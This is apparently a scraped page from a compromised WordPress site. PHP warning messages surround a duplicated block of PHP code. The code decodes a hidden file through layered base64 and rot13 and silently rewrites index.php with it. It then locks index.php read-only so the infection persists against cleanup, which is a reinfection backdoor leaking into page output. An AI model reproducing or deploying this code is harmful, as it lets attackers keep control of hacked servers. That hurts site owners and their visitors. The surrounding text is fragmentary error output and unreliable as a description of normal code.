Warning: Use of undefined constant MONTH_IN_SECONDS - assumed 'MONTH_IN_SECONDS' (this will throw an Error in a future version of PHP) in /kunden/341805_1090/webseiten/gazetebum_new/wp-content/plugins/sucuri-scanner/src/event.lib.php on line 151
Warning: Use of undefined constant MONTH_IN_SECONDS - assumed 'MONTH_IN_SECONDS' (this will throw an Error in a future version of PHP) in /kunden/341805_1090/webseiten/gazetebum_new/wp-content/plugins/sucuri-scanner/src/event.lib.php on line 157
Warning: A non-numeric value encountered in /kunden/341805_1090/webseiten/gazetebum_new/wp-content/plugins/sucuri-scanner/src/event.lib.php on line 157
$i_p = "index.php";
$index = file_get_contents($i_p);
$path = "{index_hide}";
if (file_exists($path)) {
$index_hide = file_get_contents($path);
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
@chmod($i_p, 0644);
@file_put_contents($i_p, $index_hide);
@chmod($i_p, 0444);
}
}
$i_p = "index.php";
$index = file_get_contents($i_p);
$path = "{index_hide}";
if (file_exists($path)) {
$index_hide = file_get_contents($path);
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
@chmod($i_p, 0644);
@file_put_contents($i_p, $index_hide);
@chmod($i_p, 0444);
}
}
Warning: Cannot modify header information - headers already sent by (output started at /kunden/341805_1090/webseiten/gazetebum_new/wp-content/plugins/sucuri-scanner/src/event.lib.php:151) in /kunden/341805_1090/webseiten/gazetebum_new/wp-includes/pluggable.php on line 1206